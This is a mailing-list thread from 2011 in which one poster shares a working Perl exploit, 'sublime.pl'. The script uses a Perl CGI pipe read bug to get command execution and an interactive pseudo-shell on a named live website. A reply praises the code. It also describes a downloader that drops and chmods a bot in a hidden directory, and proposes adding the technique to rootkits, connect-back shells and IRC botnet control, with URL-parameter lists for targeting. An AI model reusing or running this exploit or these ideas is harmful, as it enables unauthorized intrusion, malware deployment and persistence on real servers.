[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <CALCvwp4sxuJ_fH6UT2Ygp3CKO-nkquGr_5=X0P_7EUM_cfcBUg@mail.gmail.com>
Date: Sun, 16 Oct 2011 11:44:58 +1100
From: xD 0x41 <secn3t@...il.com>
To: Marshall Whittaker <marshallwhittaker@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: perl pipe exploit (drops you at a shell)
Thanks for the POST!
hats VERY cool, althugh it was done before, and i did not match codes to see
any differences/changes/updates, because I am aware that many systems are
being fixed against this bug as I know, or rather, perl stdinout is maybe
being patched in some versions, although it does seem to work stable on
Debian lenny and thats ok, that would mean most likely Ubuntu is also
vulnerable... Personally, i have code wich is about half the size of bth the
ones i have seen, but they do a download to box, so, it is a personal
wget.pl wich gets , makes dir if none exists, cds to dir, and the cmd is
simply like this
./file.pl pipeget www.blah.com/mybot.txt /var/.inaddr/arpa.ps
This would then save file, and chmod it automatically as chmod filename +x ,
wich is just a command i thought was critical when this type of stuff is
used... So, I might try and personalise this, and see if it works better, I
know the first method i was using to get, was nothing like the one i have
now wich is pipe() also but, it just totally makes the need for using wget
not needed, and then also the file and whole session of ./file.pl, gets
saved to bash_history as a . on its own line, wich is including if you
upload/get files from one box and up to the local one your sitting on.
Your version, looks the most adaptive one, and would be great to have
enabled on any connectback shell, maybe chmod cmd could be automatic when it
puts a file upload/download, however you access it, I know main way a user
on a control net, would simply privmsg it, and use that pipe exploiting to
upload everything, chmod, and hide eveything, wich is probably the BEST
addon i could thinkof for any rootkit, and even just upload command, if you
target index.php, and look for pg=/page=, maybe a simple my
@array("'?page=', '?pagina=', '?pg=', '?Page=', '?url=', "); for it to
target things, and make it show simple CMDS> output on connect-back, then
print a quick sysinfo and, makesure to show things right on the connectback,
then have this, and direct a while($perl_pipe_uploader2) {} ,maybe adding in
if/else using the first perlpipeupload.pl as the first method.. this could
be great!
i will look for my code wich is more like a wget but, it uses the exact same
bugs to , actually works better than the standard get/wget or fetch, as it
is no switches needed, just the corect args, and it does the rest in execl()
mode, thru this, i have i think in old days probably used this bug somuch,
it became a feautre for awhile :P
I think the scripting is great, the code is good, clear and concise,. and
very easy to simply use as an addon case 'perlpipeupload2': or, however you
may add it.. it is awesome code. I ight have to snippet this posting and,
show both, or, al 3 on my website (crazycoders.com) ,and if you have a
Posting already up wich will stay there, id be happy to point to it, and
also paste it, so, thanks!
i will try and find the code for the wget/put/uploader, when your in PM with
a bot and you do !cmd mywget a.at/bot /b/o/t , only switches is -s|-n for
silent or notice user exact infos, prettymuch a wget-summary.
I like the code and appreciate your posting. It is a nice bug and even nicer
method to exploit it.
regards,
xd-- // #haxnet@...et // Independant Arsehole
PS: shizzle my nizzle matey! shizzle it good!
On 16 October 2011 09:01, Marshall Whittaker <marshallwhittaker@...il.com>wrote:
> Well shit. It did send twice. :( Now I look like a goof, haha.
>
> On Sat, Oct 15, 2011 at 6:58 PM, Marshall Whittaker <
> marshallwhittaker@...il.com> wrote:
>
>> This works off the perl pipe read bug, you can just input the first and
>> second parts of the web address (with http:// included) and it'll drop
>> you at a shell. When using cd you must use the absolute path because I was
>> too lazy to do it the correct way. ;-). I know this is pretty easy stuff,
>> it works off those vulns that can just be exploited with a web browser, but
>> this gives you a shell. So have at it guys & gals! Had to resend because I
>> got some message about my attachment being blocked. Not sure if it really
>> was, though, I'll send again anyway. Hope this isn't spamming the list. =/
>>
>> Site:
>> http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&desc=Stat+File
>> Useage: ./sublime.pl "
>> http://ultimategto.com/cgi-bin/statsedittext.cgi?filename="
>> "&desc=Stat+File"
>>
>> Should work on most perl cgi scripts that are vulnerable to | read bug.
>> Please note, it's not a "real" shell, but almost everything works, except
>> things that won't go in one instance like cd-ing and env vars, etc.
>>
>> Play nice!
>>
>> --oxagast
>>
>> [CODE]
>>
>> #!/usr/bin/perl
>>
>> # adaptive cgi shell by oxagast
>>
>> use LWP::Simple;
>> $part1 = @ARGV[0]; $part2 = @ARGV[1];
>> print "Making buffer...\n";
>> for $bet (100..200) {
>> $bettwo = $bettwo . "AAAA" . $bet . "AAAA\\\\n";
>> }
>> print "Exploiting...\n";
>> $id = get("$part1\|id\|$part2");
>> $id =~ m/(uid=\d+\(.*\) gid=\d+\(.*\) groups=\d+\(.*\))/;
>> print "Well shizzle my nizzle... shell by oxagast... use wisely \;\)\n\n";
>> $uid = $1;
>> print "$uid\n";
>> while (0 == 0) {
>> print "\$ ";
>> $cmd = <STDIN>;
>> chomp($cmd);
>> if ($cmd =~ m/cd (\/.*)/) {
>> $dir = $1;
>> }
>> if ($cmd eq "cd ..") {
>> $dir =~ s/(.*)\/.*/\/\1/;
>> }
>> if ($cmd eq "pwd") {
>> $dirjunk = $dir;
>> if ($dirjunk eq "//") {
>> $dirjunk = "/";
>> }
>> }
>> $dirjunk = "cd $dir\;$cmd";
>> $cmdhex = unpack("H*","$dirjunk &>/tmp/cmdlnerr");
>> $cmdhex =~ s/(..)/\\\\x$1/g;
>> get("$part1\|echo -e $bettwo > /tmp/buff\|$part2");
>> $backjunk2 = get("$part1\|cat /tmp/buff\|$part2");
>> @backjunk = split("\n", $backjunk2);
>> get("$part1\|echo -e \"$cmdhex\" > /tmp/cmdln\|$part2");
>> get("$part1\|/bin/sh /tmp/cmdln > /tmp/cmdlerr\|$part2");
>> $backjunk_as = get("$part1\|cat /tmp/cmdlnerr\|$part2");
>> @backjunk_split = split("\n", $backjunk_as);
>> $backjunk_wcl = get("$part1\|wc -l /tmp/cmdlnerr\|$part2");
>> $backjunk_wcl =~ m/(\d+) \/tmp\/cmdlnerr/m;
>> $thismanylines = $1 - 1;
>> for $junknum (0..scalar(@backjunk_split)) {
>> for $fuzz (10..100+$thismanylines) {
>> if ($backjunk[$junknum] =~ m/(AAAA\Q$fuzz\EAAAA)/) {
>> $middle = $1;
>> @backjunk[$junknum] =~ m/(.*)\Q$middle\E/;
>> @backjunk_split[$junknum] =~ s/$1//;
>> @backjunk[$junknum] =~ m/\Q$middle\E(.*)/;
>> @backjunk_split[$junknum] =~ s/$1//;
>> print "$backjunk_split[$junknum]\n";
>> }
>> }
>> }
>> }
>>
>> [/CODE]
>>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists